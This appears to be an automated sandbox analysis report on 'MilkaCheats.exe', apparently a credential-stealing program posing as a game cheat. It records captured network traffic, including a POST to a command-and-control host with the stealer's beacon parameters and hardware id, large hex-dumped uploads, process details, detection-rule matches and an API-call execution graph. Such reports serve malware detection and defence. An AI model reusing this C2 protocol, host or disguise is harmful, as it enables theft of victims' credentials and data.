                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: c1 ea e2 f1 f8 27 a8 d0 0e a3 e3 31 67 0f 9e a3 2f 16 78 73 b3 c7 e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f
                                                                                            Data Ascii: '1g/xs.C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: ab 43 ea d5 bd f4 15 ad 77 08 2b ab 97 f5 9a ad 4c 39 9a e4 ce 3d 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82
                                                                                            Data Ascii: Cw+L9=*{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: c9 e1 fd 46 b7 01 d3 91 41 20 ad a8 78 e3 ef 84 a6 6e 31 e2 a5 9d f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c
                                                                                            Data Ascii: FA xn1@+ux5+Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: ef 80 52 ef 6a b3 ae bf 59 90 87 5f 0f 55 82 b2 5b 9a 47 69 43 e7 a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd
                                                                                            Data Ascii: RjY_U[GiC($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVno
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: f5 e2 91 7e ff 24 8e 02 a5 34 57 b9 31 c1 c3 30 87 bf 99 cf 2a cb d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66
                                                                                            Data Ascii: ~$4W10*Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/f
                                                                                            2024-10-27 15:45:14 UTC1023INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=rkch9u6a5bii6q0mv5725rmov4; expires=Thu, 20 Feb 2025 09:31:52 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiWyrWo0eb7JeoW3sUJQtTVGqZx4C3XX%2FITX%2FUbLjwqauha1ns%2F%2Fm83xslY9hywzxqEi4YVKXdpwTd0WlN6LyhMTuiGw1kBLxBD%2FSdKItMGzjU6QO1k0p%2BReW6KUyk%2FCG5jM"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfcadd07878a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=225&recv=621&lost=0&retrans=0&sent_bytes=2839&recv_bytes=586995&delivery_rate=2601976&cwnd=235&unsent_bytes=0&cid=e6bc6b76df598ffe&ts=3432&x=0"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449748172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:14 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 87
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:14 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 35 37 34 33 34 30 36 32 35 26 6a 3d 26 68 77 69 64 3d 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5574340625&j=&hwid=E2C1F1AA6496117263E46DCD85009A54
                                                                                            2024-10-27 15:45:15 UTC1007INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=s0f0dhdv313vvcr8gm3robjm74; expires=Thu, 20 Feb 2025 09:31:54 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vj0tNrmxoRAk8aFTmloygwppWx1T5RZzYLtfKVkLEQOHbFHwNnp2%2FIENC4DtuD16tfka7YBBzbXW1G03Rty5L%2BTn6tapPkuv3orYKfyb%2BbCJqDRADPbfE6ELa570mZodGr3M"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfe3eca03587-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=2280314&cwnd=251&unsent_bytes=0&cid=99a1b34407d3b916&ts=524&x=0"
                                                                                            2024-10-27 15:45:15 UTC54INData Raw: 33 30 0d 0a 47 30 4d 4f 48 46 6a 78 53 43 5a 41 64 63 43 72 61 4c 58 77 75 43 68 59 31 71 55 2b 71 4c 4c 46 30 45 69 2b 4f 6b 4b 31 76 37 68 41 48 67 3d 3d 0d 0a
                                                                                            Data Ascii: 30G0MOHFjxSCZAdcCraLXwuChY1qU+qLLF0Ei+OkK1v7hAHg==
                                                                                            2024-10-27 15:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:11:44:56
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\MilkaCheats.exe"
                                                                                            Imagebase:0xc0000
                                                                                            File size:536'576 bytes
                                                                                            MD5 hash:906C60B268404ECDA308E2692A3AAAF8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:11:44:56
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\MilkaCheats.exe"
                                                                                            Imagebase:0xc0000
                                                                                            File size:536'576 bytes
                                                                                            MD5 hash:906C60B268404ECDA308E2692A3AAAF8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:44:57
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232
                                                                                            Imagebase:0x450000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.2%
                                                                                              Total number of Nodes:569
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 40221 da82c 40226 da602 40221->40226 40223 da86b 40227 da621 40226->40227 40228 da634 40227->40228 40236 da649 40227->40236 40246 d030e 14 API calls __dosmaperr 40228->40246 40230 da639 40247 cb6ef 41 API calls _Deallocate 40230->40247 40232 da644 40232->40223 40243 e1208 40232->40243 40234 da81a 40252 cb6ef 41 API calls _Deallocate 40234->40252 40236->40236 40241 da769 40236->40241 40248 e0a9a 41 API calls 2 library calls 40236->40248 40238 da7b9 40238->40241 40249 e0a9a 41 API calls 2 library calls 40238->40249 40240 da7d7 40240->40241 40250 e0a9a 41 API calls 2 library calls 40240->40250 40241->40232 40251 d030e 14 API calls __dosmaperr 40241->40251 40253 e0bd2 40243->40253 40246->40230 40247->40232 40248->40238 40249->40240 40250->40241 40251->40234 40252->40232 40255 e0bde ___scrt_is_nonwritable_in_current_image 40253->40255 40254 e0be5 40273 d030e 14 API calls __dosmaperr 40254->40273 40255->40254 40257 e0c10 40255->40257 40264 e119a 40257->40264 40258 e0bea 40274 cb6ef 41 API calls _Deallocate 40258->40274 40261 e0bf4 40261->40223 40276 dad92 40264->40276 40269 e11d0 40271 e0c34 40269->40271 40330 d54b6 14 API calls __dosmaperr 40269->40330 40275 e0c67 LeaveCriticalSection __wsopen_s 40271->40275 40273->40258 40274->40261 40275->40261 40331 d03e3 40276->40331 40279 dadb6 40281 d0a98 40279->40281 40343 d0924 40281->40343 40284 e1228 40285 e1245 40284->40285 40286 e125a 40285->40286 40287 e1273 40285->40287 40382 d02fb 14 API calls __dosmaperr 40286->40382 40368 dc1ba 40287->40368 40291 e125f 40383 d030e 14 API calls __dosmaperr 40291->40383 40292 e1298 40381 e0ee1 CreateFileW 40292->40381 40293 e1281 40384 d02fb 14 API calls __dosmaperr 40293->40384 40297 e126c 40297->40269 40298 e1286 40385 d030e 14 API calls __dosmaperr 40298->40385 40300 e134e GetFileType 40301 e1359 GetLastError 40300->40301 40302 e13a0 40300->40302 40388 d02b4 14 API calls __dosmaperr 40301->40388 40390 dc105 15 API calls 2 library calls 40302->40390 40303 e1323 GetLastError 40387 d02b4 14 API calls __dosmaperr 40303->40387 40306 e12d1 40306->40300 40306->40303 40386 e0ee1 CreateFileW 40306->40386 40308 e1367 CloseHandle 40308->40291 40311 e1390 40308->40311 40309 e1316 40309->40300 40309->40303 40389 d030e 14 API calls __dosmaperr 40311->40389 40312 e13c1 40314 e140d 40312->40314 40391 e10f0 75 API calls 3 library calls 40312->40391 40319 e1414 40314->40319 40393 e0c93 75 API calls 4 library calls 40314->40393 40315 e1395 40315->40291 40318 e1442 40318->40319 40320 e1450 40318->40320 40392 d6055 44 API calls 2 library calls 40319->40392 40320->40297 40322 e14cc CloseHandle 40320->40322 40394 e0ee1 CreateFileW 40322->40394 40324 e14f7 40325 e152d 40324->40325 40326 e1501 GetLastError 40324->40326 40325->40297 40395 d02b4 14 API calls __dosmaperr 40326->40395 40328 e150d 40396 dc2cd 15 API calls 2 library calls 40328->40396 40330->40271 40332 d0401 40331->40332 40338 d03fa 40331->40338 40332->40338 40340 d4200 41 API calls 3 library calls 40332->40340 40334 d0422 40341 d8662 41 API calls __Getctype 40334->40341 40336 d0438 40342 d86c0 41 API calls __wsopen_s 40336->40342 40338->40279 40339 d5854 5 API calls std::_Lockit::_Lockit 40338->40339 40339->40279 40340->40334 40341->40336 40342->40338 40344 d094c 40343->40344 40345 d0932 40343->40345 40347 d0953 40344->40347 40348 d0972 40344->40348 40361 d0ad9 14 API calls ___free_lconv_mon 40345->40361 40353 d093c 40347->40353 40362 d0b1a 15 API calls __wsopen_s 40347->40362 40363 daaad MultiByteToWideChar 40348->40363 40351 d0981 40352 d0988 GetLastError 40351->40352 40355 d09ae 40351->40355 40366 d0b1a 15 API calls __wsopen_s 40351->40366 40364 d02b4 14 API calls __dosmaperr 40352->40364 40353->40269 40353->40284 40355->40353 40367 daaad MultiByteToWideChar 40355->40367 40356 d0994 40365 d030e 14 API calls __dosmaperr 40356->40365 40360 d09c5 40360->40352 40360->40353 40361->40353 40362->40353 40363->40351 40364->40356 40365->40353 40366->40355 40367->40360 40369 dc1c6 ___scrt_is_nonwritable_in_current_image 40368->40369 40397 cf8b0 EnterCriticalSection 40369->40397 40371 dc214 40398 dc2c4 40371->40398 40372 dc1f2 40401 dbf94 15 API calls 3 library calls 40372->40401 40376 dc1cd 40376->40371 40376->40372 40378 dc261 EnterCriticalSection 40376->40378 40377 dc1f7 40377->40371 40402 dc0e2 EnterCriticalSection 40377->40402 40378->40371 40379 dc26e LeaveCriticalSection 40378->40379 40379->40376 40381->40306 40382->40291 40383->40297 40384->40298 40385->40291 40386->40309 40387->40291 40388->40308 40389->40315 40390->40312 40391->40314 40392->40297 40393->40318 40394->40324 40395->40328 40396->40325 40397->40376 40403 cf8f8 LeaveCriticalSection 40398->40403 40400 dc234 40400->40292 40400->40293 40401->40377 40402->40371 40403->40400 40404 c1299 40405 c12a1 40404->40405 40406 c12a2 40404->40406 40407 c12aa 40406->40407 40408 c12b1 40406->40408 40413 c12b8 40407->40413 40425 c6b09 40408->40425 40414 c12c7 40413->40414 40417 c3e06 Concurrency::cancel_current_task 40413->40417 40415 c6b09 std::_Facet_Register 43 API calls 40414->40415 40416 c12cd 40415->40416 40419 c12de 40416->40419 40420 c12af 40416->40420 40439 c81dc RaiseException 40417->40439 40440 cb63b 41 API calls _Deallocate 40419->40440 40422 cb70e 40441 cb71c 11 API calls std::locale::_Setgloballocale 40422->40441 40424 cb71b 40427 c6b0e 40425->40427 40428 c12b6 40427->40428 40430 c6b2a 40427->40430 40442 cf96a 40427->40442 40450 d0e6d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 40427->40450 40431 c6b34 40430->40431 40432 c3e06 Concurrency::cancel_current_task 40430->40432 40431->40431 40449 c81dc RaiseException 40432->40449 40434 c3e22 40451 cb63b 41 API calls _Deallocate 40434->40451 40436 cb70e 40452 cb71c 11 API calls std::locale::_Setgloballocale 40436->40452 40438 cb71b 40439->40419 40440->40422 40441->40424 40447 d8614 __dosmaperr 40442->40447 40443 d8652 40454 d030e 14 API calls __dosmaperr 40443->40454 40444 d863d RtlAllocateHeap 40446 d8650 40444->40446 40444->40447 40446->40427 40447->40443 40447->40444 40453 d0e6d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 40447->40453 40449->40434 40450->40427 40451->40436 40452->40438 40453->40447 40454->40446 40455 c6d04 40456 c6d10 ___scrt_is_nonwritable_in_current_image 40455->40456 40483 c6f00 11 API calls ___scrt_uninitialize_crt 40456->40483 40458 c6d17 40459 c6e6a 40458->40459 40469 c6d41 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 40458->40469 40524 c777f 4 API calls 2 library calls 40459->40524 40461 c6e71 40525 d19dc 23 API calls std::locale::_Setgloballocale 40461->40525 40463 c6e77 40526 d19a0 23 API calls std::locale::_Setgloballocale 40463->40526 40465 c6e7f 40466 c6d60 40467 c6de1 40484 c7894 GetStartupInfoW __fread_nolock 40467->40484 40469->40466 40469->40467 40520 cf80b 41 API calls 4 library calls 40469->40520 40470 c6de7 40485 d15e0 51 API calls 40470->40485 40472 c6def 40486 c59d6 40472->40486 40477 c6e03 40477->40461 40478 c6e07 40477->40478 40479 c6e10 40478->40479 40522 d1991 23 API calls std::locale::_Setgloballocale 40478->40522 40523 c7071 77 API calls ___scrt_uninitialize_crt 40479->40523 40482 c6e18 40482->40466 40483->40458 40484->40470 40485->40472 40487 c6b09 std::_Facet_Register 43 API calls 40486->40487 40488 c59fb 40487->40488 40489 c5a37 40488->40489 40591 c22bb 43 API calls 2 library calls 40488->40591 40492 c5a4f 40489->40492 40593 c3eb0 41 API calls _Deallocate 40489->40593 40491 c5a16 40592 c2314 43 API calls 40491->40592 40495 c5a70 GetPEB 40492->40495 40594 c31f4 80 API calls 40492->40594 40527 c2f88 40495->40527 40499 c5a5a 40499->40495 40595 c3eb0 41 API calls _Deallocate 40499->40595 40505 c5a66 _Deallocate 40505->40495 40507 c5ad6 40510 c5af3 40507->40510 40571 c10ef 40507->40571 40579 c1ea3 40507->40579 40586 c40ed 40510->40586 40513 c5b65 40597 c6b4c 40513->40597 40514 c5b16 40596 c511c 112 API calls 40514->40596 40516 c5b1b GetProcessHeap HeapAlloc 40516->40513 40517 c5b37 wsprintfA GetStdHandle WriteConsoleA GetProcessHeap HeapFree 40516->40517 40517->40513 40519 c5b82 40521 c78ca GetModuleHandleW 40519->40521 40520->40467 40521->40477 40522->40479 40523->40482 40524->40461 40525->40463 40526->40465 40529 c2fbb 40527->40529 40546 c303d _Deallocate 40529->40546 40604 c1481 40529->40604 40530 c31d2 40608 c3e8a 40530->40608 40533 c6b4c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 40535 c31ed 40533->40535 40534 c6b09 std::_Facet_Register 43 API calls 40534->40546 40547 c5be2 40535->40547 40536 c1481 43 API calls 40536->40546 40537 c5be2 72 API calls 40537->40546 40538 c10ef 51 API calls 40538->40546 40541 c1ea3 80 API calls 40541->40546 40544 c3e8a 41 API calls 40544->40546 40546->40530 40546->40534 40546->40536 40546->40537 40546->40538 40546->40541 40546->40544 40612 c2855 80 API calls 3 library calls 40546->40612 40613 c14ad 43 API calls 4 library calls 40546->40613 40614 c2ec3 41 API calls 2 library calls 40546->40614 40615 c4c02 47 API calls std::_Throw_Cpp_error 40546->40615 40616 c326d 41 API calls _Deallocate 40546->40616 40548 c5bf4 40547->40548 40631 c5b91 40548->40631 40551 c2ee9 40554 c2f1a 40551->40554 40560 c2f52 40551->40560 40553 c6b4c __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 40555 c2f66 40553->40555 40557 c2f6a 40554->40557 40554->40560 40654 c22bb 43 API calls 2 library calls 40554->40654 40655 c4c86 80 API calls 2 library calls 40554->40655 40656 c3eb0 41 API calls _Deallocate 40554->40656 40561 c2107 40555->40561 40657 c3eb0 41 API calls _Deallocate 40557->40657 40560->40553 40562 c2115 40561->40562 40658 c2191 40562->40658 40566 c2150 40665 c4e0a 40566->40665 40568 c2169 40569 c2188 40568->40569 40673 c4022 40568->40673 40569->40507 40573 c10fb __EH_prolog3_catch _strlen 40571->40573 40946 c25d7 40573->40946 40574 c4022 43 API calls 40575 c1284 40574->40575 40950 c27d4 40575->40950 40577 c128c std::locale::_Setgloballocale 40577->40507 40578 c1154 40578->40574 40580 c55ea 72 API calls 40579->40580 40581 c1eb6 40580->40581 40969 c5032 40581->40969 40583 c1ec1 40584 c4a6e 51 API calls 40583->40584 40585 c1ec8 40584->40585 40585->40507 40977 c408c 40586->40977 40588 c40f8 40589 c411b DeleteFileA VirtualProtect 40588->40589 40590 c4022 43 API calls 40588->40590 40589->40513 40589->40514 40590->40589 40591->40491 40592->40489 40593->40492 40594->40499 40595->40505 40596->40516 40598 c6b54 40597->40598 40599 c6b55 IsProcessorFeaturePresent 40597->40599 40598->40519 40601 c74b6 40599->40601 40990 c7479 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40601->40990 40603 c7599 40603->40519 40605 c149e 40604->40605 40606 c148b 40604->40606 40617 c1575 40605->40617 40606->40529 40609 c31db 40608->40609 40610 c3e92 40608->40610 40609->40533 40630 c1455 41 API calls _Deallocate 40610->40630 40612->40546 40613->40546 40614->40546 40615->40546 40616->40546 40618 c1581 __EH_prolog3_catch 40617->40618 40619 c162d 40618->40619 40620 c15a1 40618->40620 40629 c3ef1 43 API calls std::_Throw_Cpp_error 40619->40629 40627 c3f07 43 API calls 2 library calls 40620->40627 40624 c15b6 40628 c335c 41 API calls _Deallocate 40624->40628 40626 c160c std::locale::_Setgloballocale 40626->40606 40627->40624 40628->40626 40630->40609 40632 c5ba6 _swprintf 40631->40632 40635 cf646 40632->40635 40636 cf65a _Deallocate 40635->40636 40637 cf67c 40636->40637 40638 cf6a3 40636->40638 40650 cb672 29 API calls _Deallocate 40637->40650 40651 ccfcd 72 API calls 2 library calls 40638->40651 40640 cf697 40644 cb42b 40640->40644 40645 cb437 40644->40645 40646 cb44e 40645->40646 40652 cb4d6 41 API calls 2 library calls 40645->40652 40648 c5aac 40646->40648 40653 cb4d6 41 API calls 2 library calls 40646->40653 40648->40551 40650->40640 40651->40640 40652->40646 40653->40648 40654->40554 40655->40554 40656->40554 40657->40560 40659 c219e 40658->40659 40680 c4b48 40659->40680 40662 c20b0 40743 c21dd 40662->40743 40664 c20b9 40664->40566 40666 c4e18 40665->40666 40667 c4e4e std::ios_base::_Ios_base_dtor 40665->40667 40749 c67a2 40666->40749 40667->40568 40671 c4e37 40758 c1ecc 72 API calls 4 library calls 40671->40758 40674 c407d 40673->40674 40678 c4039 40673->40678 40674->40569 40675 c4072 40945 c81dc RaiseException 40675->40945 40677 c408b 40678->40675 40944 c2551 43 API calls 40678->40944 40689 c38d6 40680->40689 40684 c4b64 40685 c4b7d 40684->40685 40686 c4022 43 API calls 40684->40686 40687 c2131 40685->40687 40700 c65eb 9 API calls 2 library calls 40685->40700 40686->40685 40687->40662 40690 c4022 43 API calls 40689->40690 40691 c390a 40690->40691 40692 c6b09 std::_Facet_Register 43 API calls 40691->40692 40693 c3911 40692->40693 40694 c391f 40693->40694 40701 c60e2 47 API calls 5 library calls 40693->40701 40696 c55ea 40694->40696 40697 c55fe 40696->40697 40702 c1f45 40697->40702 40699 c5607 std::ios_base::_Ios_base_dtor 40699->40684 40700->40687 40701->40694 40717 c5c48 40702->40717 40706 c1f69 40715 c1f7c 40706->40715 40736 c356e 71 API calls 2 library calls 40706->40736 40708 c1fb2 40708->40699 40710 c1f8c 40711 c1fb8 40710->40711 40712 c1f93 40710->40712 40738 c3e23 RaiseException std::_Throw_Cpp_error 40711->40738 40737 c60b0 43 API calls std::_Facet_Register 40712->40737 40729 c5ca0 40715->40729 40718 c5c5e 40717->40718 40719 c5c57 40717->40719 40721 c1f56 40718->40721 40740 c680e EnterCriticalSection 40718->40740 40739 cf90f 6 API calls std::_Lockit::_Lockit 40719->40739 40723 c2b8b 40721->40723 40724 c2bbb 40723->40724 40725 c2b97 40723->40725 40724->40706 40726 c5c48 std::_Lockit::_Lockit 7 API calls 40725->40726 40727 c2ba1 40726->40727 40728 c5ca0 std::_Lockit::~_Lockit 2 API calls 40727->40728 40728->40724 40730 cf91d 40729->40730 40731 c5caa 40729->40731 40742 cf8f8 LeaveCriticalSection 40730->40742 40733 c5cbd 40731->40733 40741 c681c LeaveCriticalSection 40731->40741 40733->40708 40734 cf924 40734->40708 40736->40710 40737->40715 40739->40721 40740->40721 40741->40733 40742->40734 40744 c6b09 std::_Facet_Register 43 API calls 40743->40744 40745 c2215 40744->40745 40747 c2223 40745->40747 40748 c60e2 47 API calls 5 library calls 40745->40748 40747->40664 40748->40747 40750 c6725 40749->40750 40751 c4e26 